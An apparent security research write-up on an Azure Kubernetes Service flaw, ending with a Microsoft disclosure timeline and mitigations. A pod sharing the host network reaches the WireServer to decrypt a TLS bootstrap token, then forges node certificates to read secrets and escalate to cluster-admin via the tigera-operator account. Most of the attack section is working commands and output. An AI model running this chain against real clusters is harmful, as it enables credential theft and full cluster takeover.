The kube-apiserver-client-kubelet signer is started by the controller-manager:

// From https://github.com/kubernetes/kubernetes/blob/4175ca0c5e4242bc3a131e63f2c14de499aac54c/cmd/kube-controller-manager/app/certificates.go#L60

if kubeletClientSignerCertFile, kubeletClientSignerKeyFile := getKubeletClientSignerFiles(controllerContext.ComponentConfig.CSRSigningController); len(kubeletClientSignerCertFile) > 0 || len(kubeletClientSignerKeyFile) > 0 {

kubeletClientSigner, err := signer.NewKubeletClientCSRSigningController(ctx, c, csrInformer, kubeletClientSignerCertFile, kubeletClientSignerKeyFile, certTTL)

if err != nil {

return nil, false, fmt.Errorf("failed to start kubernetes.io/kube-apiserver-client-kubelet certificate controller: %v", err)

}

go kubeletClientSigner.Run(ctx, 5)

It monitors CSRs with a signerName value of kubernetes.io/kube-apiserver-client-kubelet. When one is approved, the same checks as the CSRApprovingController are performed:

- The certificate's Organization field must be system:nodes.

- No SAN field (DNS, email, IP or URI) must be provided.

- The commonName must start with system:node:.

- The certificate usages are client auth, digital signature and optionally key encipherment.

If valid, it will be signed with the cluster CA, and can be retrieved.

The whole workflow is summarized in this sequence diagram:

This process can vary in a non-kubeadm deployment (for example for cloud providers), but will remain similar for the most part.

But enough Kubernetes arcana: how can this feature be exploited in AKS?

Azure Kubernetes Service Exploit

During one of our assessments, we discovered that within a pod using the host network namespace, an attacker can access the WireServer provided by Microsoft Azure. This service allows virtual machines to access metadata about themselves, such as network configuration, subscription details, and authentication credentials, allowing them to dynamically adjust to their environment. In particular, this service provides each node with a certificate and a bootstrap token.

Lab setup



To demonstrate the exploit, we will set up an AKS cluster 1.28.5 with the default configuration and a pool of two A2 v2 node VMs:

We can access our cluster by retrieving the kubeconfig file with the az CLI:

$ az aks get-credentials --resource-group bootstrap-exploit_group --name bootstrap-exploit --overwrite-existing

Merged "bootstrap-exploit" as current context in /home/user/.kube/config

Then, kubectl can be used to interact with our cluster:

$ kubectl get nodes

NAME STATUS ROLES AGE VERSION

aks-pool-20854315-vmss000000 Ready agent 119s v1.28.5

aks-pool-20854315-vmss000001 Ready agent 2m39s v1.28.5

Simple NGINX pods will be used to simulate common workloads, one on each node.

On the first node, we deploy a pod using the HostNetwork namespace with the following description:

apiVersion: v1

kind: Pod

metadata:

name: pod-hostnetwork

spec:

nodeName: aks-pool-20854315-vmss000000

containers:

- name: nginx

image: nginx

hostNetwork: true

On the second node, we deploy a pod mounting a secret, and without sharing the HostNetwork namespace:

apiVersion: v1

kind: Secret

metadata:

name: my-secret

data:

secret: TXlTdXBlclNlY3JldAo=

---

apiVersion: v1

kind: Pod

metadata:

name: pod-target

spec:

nodeName: aks-pool-20854315-vmss000001

volumes:

- name: secret

secret:

secretName: my-secret

containers:

- name: nginx

image: nginx

volumeMounts:

- name: secret

mountPath: /secret

We can verify that the pods are deployed, each on its respective node:

$ kubectl get pod -o wide -n default

NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES

pod-hostnetwork 1/1 Running 0 10m 10.224.0.33 aks-pool-20854315-vmss000000 <none> <none>

pod-target 1/1 Running 0 19s 10.224.0.24 aks-pool-20854315-vmss000001 <none> <none>

To simulate the compromise of the pods, we will get a shell with kubectl:

$ kubectl exec -ti pod-target -- /bin/bash

root@pod-target:/#

$ kubectl exec -ti pod-hostnetwork -- /bin/bash

root@aks-agentpool-35718821-vmss000001:/#

As pod-hostnetwork shares the host network namespace, its hostname is the same as the host's (here aks-agentpool-35718821-vmss000001).

Access to the WireServer service

As described earlier, the WireServer allows Azure VMs to retrieve their configuration, such as initialization commands and environment variables. It is accessible at the IP address 168.63.129.16 on TCP ports 80 and 32526. We will not dive into the inner workings of this service, as others already have.

From both pods, the http://168.63.129.16:32526/vmSettings endpoint is available and is used by the WAAgent to retrieve configurations and commands to execute when provisioning the node. The protectedSettings parameter is used to pass sensitive data to the agent:

root@aks-agentpool-35718821-vmss000001:/# curl http://168.63.129.16:32526/vmSettings

[...]

{

[...]

"extensionGoalStates": [

{

[...]

"settings": [

{

"protectedSettingsCertThumbprint": "331AA862474F01C9A67E7A77A124CA9235062DA2",

"protectedSettings": "MIJkLAYJKoZIhvcNAQcDoIJkHTCCZBkCAQAxggFpMIIBZQIBADBNMDkxNzA1BgoJkiaJk[...]",

"publicSettings": "{}"

}

]

}

[...]

]

}
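Extracting the interesting fields from this response is straightforward. The Go sketch below only relies on the JSON keys visible in the output above (extensionGoalStates, settings, protectedSettingsCertThumbprint, protectedSettings); the rest of the document is ignored, and the sample values in `main` are placeholders rather than real data.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// vmSettings maps only the fields of the response used in this sketch.
type vmSettings struct {
	ExtensionGoalStates []struct {
		Settings []struct {
			Thumbprint        string `json:"protectedSettingsCertThumbprint"`
			ProtectedSettings string `json:"protectedSettings"`
		} `json:"settings"`
	} `json:"extensionGoalStates"`
}

// protectedBlob is one encrypted settings blob and the thumbprint of the
// certificate it was encrypted for.
type protectedBlob struct {
	Thumbprint string
	Base64     string
}

// extractProtected returns every non-empty protectedSettings entry.
func extractProtected(body []byte) ([]protectedBlob, error) {
	var doc vmSettings
	if err := json.Unmarshal(body, &doc); err != nil {
		return nil, err
	}
	var out []protectedBlob
	for _, ext := range doc.ExtensionGoalStates {
		for _, s := range ext.Settings {
			if s.ProtectedSettings != "" {
				out = append(out, protectedBlob{Thumbprint: s.Thumbprint, Base64: s.ProtectedSettings})
			}
		}
	}
	return out, nil
}

func main() {
	// Placeholder document with the same shape as the response above.
	sample := []byte(`{"extensionGoalStates":[{"settings":[{
		"protectedSettingsCertThumbprint":"EXAMPLE-THUMBPRINT",
		"protectedSettings":"EXAMPLE-BASE64-BLOB",
		"publicSettings":"{}"}]}]}`)
	blobs, err := extractProtected(sample)
	if err != nil {
		panic(err)
	}
	for _, b := range blobs {
		fmt.Printf("thumbprint=%s blob=%s\n", b.Thumbprint, b.Base64)
	}
}
```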

The protectedSettings value is encrypted for the certificate identified by the protectedSettingsCertThumbprint parameter. The corresponding private key is available to the virtual machine through the WireServer. The protected string can be decrypted using the script provided by CyberCX:

$ cat decrypt.sh

# Generate self-signed cert

openssl req -x509 -nodes -subj "/CN=LinuxTransport" -days 730 -newkey rsa:2048 -keyout temp.key -outform DER -out temp.crt

# Get certificates URL from GoalState

CERT_URL=$(curl 'http://168.63.129.16/machine/?comp=goalstate' -H 'x-ms-version: 2015-04-05' -s | grep -oP '(?<=Certificates>).+(?=</Certificates>)' | recode html..ascii)

# Get encrypted envelope (encrypted with self-signed cert)

curl $CERT_URL -H 'x-ms-version: 2015-04-05' -H "x-ms-guest-agent-public-x509-cert: $(base64 -w0 ./temp.crt)" -s | grep -Poz '(?<=<Data>)(.*\n)*.*(?=</Data>)' | base64 -di > payload.p7m

# Decrypt envelope

openssl cms -decrypt -inform DER -in payload.p7m -inkey ./temp.key -out payload.pfx

# Unpack archive

openssl pkcs12 -nodes -in payload.pfx -password pass: -out wireserver.key

# Decrypt protected settings

curl -s 'http://168.63.129.16:32526/vmSettings' | jq .extensionGoalStates[].settings[].protectedSettings | sed 's/"//g' > protected_settings.b64

File=protected_settings.b64

Lines=$(cat $File)

for Line in $Lines

do

echo $Line | base64 -d > protected_settings.raw

openssl cms -decrypt -inform DER -in protected_settings.raw -inkey ./wireserver.key

done

However, trying this script on the pod-target does not work. Indeed, the request to http://168.63.129.16/machine/?comp=goalstate times out:

root@pod-target:/# curl 'http://168.63.129.16/machine/?comp=goalstate' -H 'x-ms-version: 2015-04-05'

curl: (28) Failed to connect to 168.63.129.16 port 80 after 129840 ms: Couldn't connect to server

This is due to a firewall rule on the host: any packet forwarded to 168.63.129.16:80 is dropped.

root@aks-pool-20854315-vmss000000:/# iptables -vnL

[...]

Chain FORWARD (policy ACCEPT 862 packets, 97768 bytes)

pkts bytes target prot opt in out source destination

[...]

0 0 DROP 6 -- * * 0.0.0.0/0 168.63.129.16 tcp dpt:80

However, when sharing the HostNetwork namespace, the packet is not forwarded, as the host's NICs are directly available, and it is accepted by the OUTPUT chain.

root@aks-pool-20854315-vmss000000:/# curl 'http://168.63.129.16/machine/?comp=goalstate' -H 'x-ms-version: 2015-04-05'

<?xml version="1.0" encoding="utf-8"?>

<GoalState xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="goalstate10.xsd">

[...]

</Container>

Executing decrypt.sh from pod-hostnetwork therefore gives us the commands run by the Azure agent when deploying the node:

root@aks-pool-20854315-vmss000000:/# ./decrypt.sh

[...]

-----

{"commandToExecute":"[..] KUBELET_CLIENT_CONTENT=\"LS0[...]K\"

KUBELET_CLIENT_CERT_CONTENT=\"[...]\"

TLS_BOOTSTRAP_TOKEN=\"71zkdy.fmcsstmk697ibh9x\" [...]

/usr/bin/nohup /bin/bash -c \"/bin/bash /opt/azure/containers/provision_start.sh\""}

We observe several interesting parameters but in particular, a bootstrap token is available. It is used by the /opt/azure/containers/provision_configs.sh script on the host to create a kubeconfig to perform the TLS bootstrap process:

[...]

elif [ "${ENABLE_TLS_BOOTSTRAPPING}" == "true" ]; then

BOOTSTRAP_KUBECONFIG_FILE=/var/lib/kubelet/bootstrap-kubeconfig

mkdir -p "$(dirname "${BOOTSTRAP_KUBECONFIG_FILE}")"

touch "${BOOTSTRAP_KUBECONFIG_FILE}"

chmod 0644 "${BOOTSTRAP_KUBECONFIG_FILE}"

tee "${BOOTSTRAP_KUBECONFIG_FILE}" > /dev/null <<EOF

apiVersion: v1

kind: Config

clusters:

- name: localcluster

cluster:

certificate-authority: /etc/kubernetes/certs/ca.crt

server: https://${API_SERVER_NAME}:443

users:

- name: kubelet-bootstrap

user:

token: "${TLS_BOOTSTRAP_TOKEN}"

contexts:

- context:

cluster: localcluster

user: kubelet-bootstrap

name: bootstrap-context

current-context: bootstrap-context

EOF

[...]

They said I could become anything

The idea is to use this token to sign a certificate for an already existing node, which sidesteps the restrictions of the Node authorization mode and gives access to the secrets linked to the targeted node. This attack is well described in this blog post from 4armed, or this one from Rhino Security Labs regarding GKE TLS bootstrapping.

In a normal scenario from a compromised pod, an attacker does not have any information about the existing nodes. A first certificate for a non-existing node can therefore be signed with the bootstrap token. Here, we create a CSR for the node called newnode using the cfssl tool.

root@aks-pool-20854315-vmss000000:/# cat << EOF | cfssl genkey - | cfssljson -bare newnode

{

"CN": "system:node:newnode",

"key": {

"algo": "rsa",

"size": 2048

},

"names": [

{

"O": "system:nodes"

}

]

}

EOF

[INFO] generate received request

[INFO] received CSR

[INFO] generating key: rsa-2048

[INFO] encoded CSR

Once the signature request is created, it can be submitted to the API server:

root@aks-pool-20854315-vmss000000:/# cat << EOF | ./kubectl --insecure-skip-tls-verify \
  --token "71zkdy.fmcsstmk697ibh9x" --server https://10.0.0.1 apply -f -
apiVersion: certificates.k8s.io/v1
kind: CertificateSigningRequest
metadata:
  name: newnode
spec:
  signerName: kubernetes.io/kube-apiserver-client-kubelet
  groups:
  - system:nodes
  request: $(cat newnode.csr | base64 | tr -d '\n')
  usages:
  - digital signature
  - key encipherment
  - client auth
EOF
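Since the same manifest is needed again for every node we want to impersonate, it can be convenient to generate it from a function. This is only a sketch: csr_manifest is a hypothetical helper name, and its fields simply mirror the manifest submitted above.

```shell
# Sketch: print a CertificateSigningRequest manifest for a PEM CSR file.
# csr_manifest is a hypothetical helper name; $1 is the object name,
# $2 the path to the CSR file.
csr_manifest() {
  local name="$1" csr_file="$2"
  cat <<EOF
apiVersion: certificates.k8s.io/v1
kind: CertificateSigningRequest
metadata:
  name: ${name}
spec:
  signerName: kubernetes.io/kube-apiserver-client-kubelet
  groups:
  - system:nodes
  request: $(base64 < "${csr_file}" | tr -d '\n')
  usages:
  - digital signature
  - key encipherment
  - client auth
EOF
}
```

The output can be piped to the same kubectl apply -f - invocation, for example csr_manifest newnode newnode.csr.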

As the request satisfies the conditions of the CSRApprovingController, it is auto-approved and auto-signed by the kube-apiserver-client-kubelet signer:

root@aks-pool-20854315-vmss000000:/# ./kubectl --insecure-skip-tls-verify --token "71zkdy.fmcsstmk697ibh9x" --server https://10.0.0.1 get csr

NAME AGE SIGNERNAME REQUESTOR REQUESTEDDURATION CONDITION

csr-2ptf8 49m kubernetes.io/kube-apiserver-client-kubelet system:bootstrap:71zkdy <none> Approved,Issued

csr-rt76f 49m kubernetes.io/kube-apiserver-client-kubelet system:bootstrap:71zkdy <none> Approved,Issued

newnode 40s kubernetes.io/kube-apiserver-client-kubelet system:bootstrap:71zkdy <none> Approved,Issued
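The REQUESTOR column shows how the API server names a bootstrap token holder: system:bootstrap: followed by the token ID, which is the part of the token before the dot. A minimal sketch of that mapping, assuming the standard token format of a 6-character ID and a 16-character secret drawn from [a-z0-9]; bootstrap_username is a hypothetical helper name.

```shell
# Sketch: derive the API username associated with a bootstrap token.
# bootstrap_username is a hypothetical helper name.
bootstrap_username() {
  local token="$1"
  # Expected shape: <6 chars>.<16 chars>, lowercase letters and digits only.
  if printf '%s' "$token" | grep -Eq '^[a-z0-9]{6}\.[a-z0-9]{16}$'; then
    # Only the token ID (before the dot) appears in the username.
    printf 'system:bootstrap:%s\n' "${token%%.*}"
  else
    echo "not a bootstrap token: expected <6 chars>.<16 chars>" >&2
    return 1
  fi
}

bootstrap_username "71zkdy.fmcsstmk697ibh9x"   # prints system:bootstrap:71zkdy
```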

The certificate requests of the other nodes are also listed. Valid node names can be read from them without signing a new certificate, which is stealthier, but CSRs are automatically removed after a certain period of time (1 hour for issued certificates). Signing a certificate for a fake node is therefore often required to retrieve the names of the other nodes.

root@aks-pool-20854315-vmss000000:/# ./kubectl --insecure-skip-tls-verify --token "71zkdy.fmcsstmk697ibh9x" \
  --server https://10.0.0.1 get csr newnode -o jsonpath='{.status.certificate}' | base64 -d > newnode.crt

root@aks-pool-20854315-vmss000000:/# ./kubectl --insecure-skip-tls-verify \
  --client-certificate newnode.crt --client-key newnode-key.pem --server https://10.0.0.1 get node

NAME STATUS ROLES AGE VERSION

aks-pool-20854315-vmss000000 Ready agent 57m v1.28.5

aks-pool-20854315-vmss000001 Ready agent 57m v1.28.5
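The stealthier alternative mentioned earlier, reading node names from the CSRs left by legitimate kubelets, can be sketched as follows. We assume the request field of a CSR object is the base64-encoded PEM request, as in the manifests submitted above; csr_subject is a hypothetical helper name.

```shell
# Sketch: print the subject of the PKCS#10 request embedded in a CSR object.
# Input on stdin: the base64 value of .spec.request.
# csr_subject is a hypothetical helper name.
csr_subject() {
  base64 -d | openssl req -noout -subject
}
```

For instance, the value returned by get csr csr-2ptf8 -o jsonpath='{.spec.request}' can be piped into csr_subject; the CN of the printed subject should have the form system:node:<node name>.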

We can verify that the Node authorization mode prevents us from retrieving the secret that is attached to pod-target:

root@aks-pool-20854315-vmss000000:/# ./kubectl --insecure-skip-tls-verify --client-certificate newnode.crt \
  --client-key newnode-key.pem --server https://10.0.0.1 get secret my-secret

Error from server (Forbidden): secrets "my-secret" is forbidden: User "system:node:newnode" cannot get resource "secrets" in API group "" in the namespace "default": no relationship found between node 'newnode' and this object

The Node authorization mode only allows nodes to retrieve information for workloads they manage. To access the secret from pod-target, we need to use the identity of the node where it runs, which in our setup is aks-pool-20854315-vmss000001:

root@aks-pool-20854315-vmss000000:/# ./kubectl --insecure-skip-tls-verify --client-certificate newnode.crt \
  --client-key newnode-key.pem --server https://10.0.0.1 get pod -o wide

NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES

pod-hostnetwork 1/1 Running 0 27m 10.224.0.10 aks-pool-20854315-vmss000002 <none> <none>

pod-target 1/1 Running 0 27m 10.224.0.41 aks-pool-20854315-vmss000001 <none> <none>

We will impersonate this node by requesting, with the bootstrap token, a new certificate that carries its name:

root@aks-pool-20854315-vmss000000:/# cat << EOF | cfssl genkey - | cfssljson -bare aks-pool-20854315-vmss000001
{
  "CN": "system:node:aks-pool-20854315-vmss000001",
  "key": {
    "algo": "rsa",
    "size": 2048
  },
  "names": [
    {
      "O": "system:nodes"
    }
  ]
}
EOF

[INFO] generate received request

[INFO] received CSR

[INFO] generating key: rsa-2048

[INFO] encoded CSR

root@aks-pool-20854315-vmss000000:/# cat << EOF | ./kubectl --insecure-skip-tls-verify --token "71zkdy.fmcsstmk697ibh9x" --server https://10.0.0.1 apply -f -
apiVersion: certificates.k8s.io/v1
kind: CertificateSigningRequest
metadata:
  name: aks-pool-20854315-vmss000001
spec:
  signerName: kubernetes.io/kube-apiserver-client-kubelet
  groups:
  - system:nodes
  request: $(cat aks-pool-20854315-vmss000001.csr | base64 | tr -d '\n')
  usages:
  - digital signature
  - key encipherment
  - client auth
EOF

root@aks-pool-20854315-vmss000000:/# ./kubectl --insecure-skip-tls-verify --token "71zkdy.fmcsstmk697ibh9x" --server https://10.0.0.1 get csr aks-pool-20854315-vmss000001 -o jsonpath='{.status.certificate}' | base64 -d > aks-pool-20854315-vmss000001.crt

With this certificate, it is possible to retrieve the secret of pod-target:

./kubectl --insecure-skip-tls-verify --client-certificate aks-pool-20854315-vmss000001.crt --client-key aks-pool-20854315-vmss000001-key.pem --server https://10.0.0.1 get secret my-secret -o yaml

apiVersion: v1

data:

secret: TXlTdXBlclNlY3JldAo=

kind: Secret

[...]
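Values under a Secret's data field are only base64-encoded, so the retrieved value can be read directly. A minimal sketch; decode_secret_value is a hypothetical helper name.

```shell
# Sketch: decode a base64 value copied from a Secret's .data field.
# decode_secret_value is a hypothetical helper name.
decode_secret_value() {
  printf '%s' "$1" | base64 -d
}

decode_secret_value 'TXlTdXBlclNlY3JldAo='   # prints MySuperSecret
```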

Road to cluster admin

By successively impersonating each node, it is possible to retrieve all secrets bound to pods. In a real cluster, this is often enough, as database credentials or privileged service accounts would be compromised.

Regarding out-of-the-box Azure clusters, the possibilities are limited. However, we found that in some configurations, it is possible to elevate our privileges to cluster admin by exploiting pre-installed services. Indeed, if the cluster is configured to use Calico network policies, several workloads are deployed by default:

$ kubectl get pod -A -o wide

NAMESPACE NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES

calico-system calico-kube-controllers-d9bcc4f84-xgkgn 1/1 Running 0 94m 10.224.0.104 aks-agentpool-26927499-vmss000000 <none> <none>

calico-system calico-node-v4f98 1/1 Running 0 94m 10.224.0.4 aks-agentpool-26927499-vmss000000 <none> <none>

calico-system calico-typha-7ffff74d9b-mcpvz 1/1 Running 0 94m 10.224.0.4 aks-agentpool-26927499-vmss000000 <none> <none>

kube-system ama-metrics-7b7686f494-4dzgc 2/2 Running 0 91m 10.224.0.20 aks-agentpool-26927499-vmss000000 <none> <none>

kube-system ama-metrics-ksm-d9c6f475b-tvwws 1/1 Running 0 91m 10.224.0.61 aks-agentpool-26927499-vmss000000 <none> <none>

kube-system ama-metrics-node-9dkwf 2/2 Running 0 91m 10.224.0.112 aks-agentpool-26927499-vmss000000 <none> <none>

kube-system azure-ip-masq-agent-fr6tt 1/1 Running 0 95m 10.224.0.4 aks-agentpool-26927499-vmss000000 <none> <none>

kube-system cloud-node-manager-4z8m2 1/1 Running 0 95m 10.224.0.4 aks-agentpool-26927499-vmss000000 <none> <none>

kube-system coredns-7459659b97-bkx9r 1/1 Running 0 95m 10.224.0.36 aks-agentpool-26927499-vmss000000 <none> <none>

kube-system coredns-7459659b97-wxz7g 1/1 Running 0 94m 10.224.0.29 aks-agentpool-26927499-vmss000000 <none> <none>

kube-system coredns-autoscaler-7c88465478-9p6d4 1/1 Running 0 95m 10.224.0.13 aks-agentpool-26927499-vmss000000 <none> <none>

kube-system csi-azuredisk-node-45swd 3/3 Running 0 95m 10.224.0.4 aks-agentpool-26927499-vmss000000 <none> <none>

kube-system csi-azurefile-node-drzss 3/3 Running 0 95m 10.224.0.4 aks-agentpool-26927499-vmss000000 <none> <none>

kube-system konnectivity-agent-67cc45dcb4-9xgv2 1/1 Running 0 42m 10.224.0.102 aks-agentpool-26927499-vmss000000 <none> <none>

kube-system konnectivity-agent-67cc45dcb4-drcw9 1/1 Running 0 41m 10.224.0.25 aks-agentpool-26927499-vmss000000 <none> <none>

kube-system kube-proxy-59pr7 1/1 Running 0 95m 10.224.0.4 aks-agentpool-26927499-vmss000000 <none> <none>

kube-system metrics-server-7fd45bf99d-cf6sq 2/2 Running 0 94m 10.224.0.67 aks-agentpool-26927499-vmss000000 <none> <none>

kube-system metrics-server-7fd45bf99d-tw9kc 2/2 Running 0 94m 10.224.0.109 aks-agentpool-26927499-vmss000000 <none> <none>

tigera-operator tigera-operator-7d4fc76bf9-9cbw6 1/1 Running 0 95m 10.224.0.4 aks-agentpool-26927499-vmss000000 <none> <none>

Among them is the tigera-operator pod, which is used to deploy and manage Calico. It uses the tigera-operator service account:

$ kubectl get pod tigera-operator-7d4fc76bf9-9cbw6 -n tigera-operator -o yaml | grep serviceAccountName

serviceAccountName: tigera-operator

This service account is linked with a clusterrolebinding to the tigera-operator cluster role:

$ kubectl get clusterrolebinding -A -o wide | grep tigera

tigera-operator ClusterRole/tigera-operator 83m tigera-operator/tigera-operator

This role is quite privileged, and elevating our privileges further is probably not necessary to perform most interesting actions in the cluster:

rules:
- apiGroups:
  - ""
  resources:
  - namespaces
  - pods
  - podtemplates
  - services
  - endpoints
  - events
  - configmaps
  - secrets
  - serviceaccounts
  verbs:
  - create
  - get
  - list
  - update
  - delete
  - watch
[...]
- apiGroups:
  - rbac.authorization.k8s.io
  resources:
  - clusterroles
  - clusterrolebindings
  - rolebindings
  - roles
  verbs:
  - create
  - get
  - list
  - update
  - delete
  - watch
  - bind
  - escalate
- apiGroups:
  - apps
  resources:
  - deployments
  - daemonsets
  - statefulsets
  verbs:
  - create
  - get
  - list
  - patch
  - update
  - delete
  - watch
[...]

But we will do it anyway, as the escalate, bind and update permissions on ClusterRole and ClusterRoleBinding allow for a simple privilege escalation, either by updating our own ClusterRole or by binding our service account to a more privileged one.

With the identity of the node that runs the tigera-operator pod (here aks-agentpool-26927499-vmss000000), we can retrieve a JWT for the tigera-operator service account. For that, we need the uid of the pod to bind the new service account's JWT to it (to please the NodeRestriction admission plugin):

$ alias knode="kubectl --server https://bootstrap-calico-dns-70xz0tti.hcp.westeurope.azmk8s.io:443 --insecure-skip-tls-verify --client-certificate aks-agentpool-26927499-vmss000000.crt --client-key aks-agentpool-26927499-vmss000000-key.pem"

$ knode get pod tigera-operator-7d4fc76bf9-9cbw6 -n tigera-operator -o yaml | grep uid -n3

[...]

20- resourceVersion: "952"

21: uid: 16d98b28-e9d3-4ccb-9bfe-13c4d9626a3c

22-spec:

23- affinity:

$ knode create token -n tigera-operator tigera-operator --bound-object-kind Pod --bound-object-name tigera-operator-7d4fc76bf9-9cbw6 --bound-object-uid 16d98b28-e9d3-4ccb-9bfe-13c4d9626a3c

eyJhbGciOiJSUzI1NiIsImtpZCI6IlVudXl0d0ZMbmFnNklrWTctcURWWU4xbm[...]
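Before using the token, its claims can be inspected to confirm that it is bound to the expected pod. The sketch below decodes the payload of a JWT without verifying its signature; jwt_payload is a hypothetical helper name, and we assume the token was captured in a shell variable such as TOKEN.

```shell
# Sketch: print the claims of a JWT without verifying its signature.
# jwt_payload is a hypothetical helper name.
jwt_payload() {
  local seg
  # Take the second dot-separated segment and map base64url to standard base64.
  seg=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')
  # JWT segments drop the '=' padding, so restore it before decoding.
  while [ $(( ${#seg} % 4 )) -ne 0 ]; do
    seg="${seg}="
  done
  printf '%s' "$seg" | base64 -d
}
```

Running jwt_payload "$TOKEN" prints the JSON claims; for a bound token, the pod name and uid passed to create token should appear among them.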

The created token can be used to authenticate to the API server as tigera-operator:

$ alias ktigera="kubectl --token $TOKEN --server https://bootstrap-calico-dns-70xz0tti.hcp.westeurope.azmk8s.io:443 --insecure-skip-tls-verify"

$ ktigera auth whoami

ATTRIBUTE VALUE

Username system:serviceaccount:tigera-operator:tigera-operator

UID dfd5effb-444b-4d53-af92-ae72724d2c48

Groups [system:serviceaccounts system:serviceaccounts:tigera-operator system:authenticated]

Extra: authentication.kubernetes.io/pod-name [tigera-operator-7d4fc76bf9-9cbw6]

Extra: authentication.kubernetes.io/pod-uid [16d98b28-e9d3-4ccb-9bfe-13c4d9626a3c]

$ ktigera auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

daemonsets.apps [] [] [create get list patch update delete watch]

deployments.apps [] [] [create get list patch update delete watch]

statefulsets.apps [] [] [create get list patch update delete watch]

clusterrolebindings.rbac.authorization.k8s.io [] [] [create get list update delete watch bind escalate]

clusterroles.rbac.authorization.k8s.io [] [] [create get list update delete watch bind escalate]

rolebindings.rbac.authorization.k8s.io [] [] [create get list update delete watch bind escalate]

roles.rbac.authorization.k8s.io [] [] [create get list update delete watch bind escalate]

configmaps [] [] [create get list update delete watch]

endpoints [] [] [create get list update delete watch]

events [] [] [create get list update delete watch]

namespaces [] [] [create get list update delete watch]

pods [] [] [create get list update delete watch]

podtemplates [] [] [create get list update delete watch]

resourcequotas [] [calico-critical-pods] [create get list update delete watch]

resourcequotas [] [tigera-critical-pods] [create get list update delete watch]

secrets [] [] [create get list update delete watch]

serviceaccounts [] [] [create get list update delete watch]

services [] [] [create get list update delete watch]

The following ClusterRoleBinding, saved as privesc.yaml, binds the cluster-admin role to the tigera-operator service account:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: tigera-operator-admin-binding
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: tigera-operator
  namespace: tigera-operator

By applying it, we elevate our privileges to cluster-admin:

$ ktigera apply -f privesc.yaml

clusterrolebinding.rbac.authorization.k8s.io/tigera-operator-admin-binding created

$ ktigera auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

*.* [] [] [*]

[*] [] [*]

[...]

Response and possible mitigation

Microsoft's response

Here is the timeline regarding our communication with Microsoft:

| Date | Event |
|---|---|
| 2023-06-22 | Vulnerability first reported to Microsoft |
| 2023-08-09 | Case closed due to miscommunication about the host network namespace requirement |
| 2023-08-09 | New case opened regarding the issue |
| 2023-08-27 | Follow-up email to Microsoft |
| 2023-10-07 | Follow-up to Microsoft |
| 2023-11-13 | Microsoft's response and case closure |

The explanation given by Microsoft on 2023-11-13 to close this issue is the following:

Thank you for your submission. We determined your finding is valid but does

not meet our bar for immediate servicing because even though the issue can

bypass a security boundary, it only compromises it at a cluster level.

However, we’ve marked your finding for future review as an opportunity to

improve our products. I do not have a timeline for this review. As no further

action is required at this time, I am closing this case.

Since this issue was raised, Microsoft has been working on a potential solution in this GitHub repository: https://github.com/Azure/aks-secure-tls-bootstrap. But, for the moment, neither documentation nor a parameter seems to be available to activate it.

Possible mitigation

To our knowledge, there is no mitigation other than not using pods that share the host network namespace. Deleting the bootstrap token manually will not work, as it will be automatically recreated. Bootstrap tokens seem to be tied to a node pool, so in case of a compromise, the whole node pool should be deleted and replaced with a new one, which will rotate the bootstrap token.
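To apply this in practice, one first needs to know which pods share the host network namespace. A minimal sketch, assuming the pod list is produced with kubectl custom columns in the order namespace, name, hostNetwork; hostnetwork_pods is a hypothetical helper name.

```shell
# Sketch: keep only the pods whose hostNetwork column is "true".
# Expected input on stdin, one pod per line: <namespace> <name> <hostNetwork>
# hostnetwork_pods is a hypothetical helper name.
hostnetwork_pods() {
  awk '$3 == "true" { print $1 "/" $2 }'
}
```

The input can be produced with kubectl get pods -A --no-headers -o custom-columns='NS:.metadata.namespace,NAME:.metadata.name,HOSTNET:.spec.hostNetwork'. Pods that do not set the field show <none> in the last column and are filtered out.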

Conclusion

The exploitation of bootstrap tokens is not new, as it has already been performed against other cloud providers. But little information exists regarding their exploitation in environments other than GCP. In Kubernetes' complex infrastructure, being able to retrieve a secret, whether it is a service account token or a bootstrap token, can be enough to compromise the whole cluster. Sharing the host's namespaces, like allowing privileged workloads, can have serious security implications, especially in cloud deployments where VMs come and go and must be able to join the cluster. This is why we may expect cloud providers to harden the deployment process to prevent access to such credentials. However, the use of bootstrap tokens in AKS is less secure than in an on-premises cluster, where they are short-lived secrets only available when deploying a new node.

The kubeletmein tool gathers the exploitation techniques of bootstrap tokens for different cloud providers. Since this was not known to be possible in AKS until now, a pull request will be made to add support for Azure.